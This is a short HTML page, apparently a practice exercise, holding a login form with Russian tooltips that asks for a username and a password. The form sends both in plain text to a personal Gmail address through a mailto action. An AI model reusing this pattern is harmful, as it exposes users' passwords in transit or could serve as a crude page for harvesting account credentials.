<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>forms</title>
    <style>
        .form {
            display: inline-block;
            float: right;
            margin: auto;
            padding: 5px;

        }
    </style>
</head>

<body>
    <div class="form">
        <form autocomplete="on" action="mailto:yanusoff@gmail.com" enctype="text/plain">
            <p>Login <input name="user" title="введите имя, адрес электронной почты или номер телефона"></p>
            <p>Enter your password <input name="pass" type="password" title="введите свой пароль"></p>
            <p ><input type="submit" value="Send"></p>
        </form>
    </div>
</body>
</html>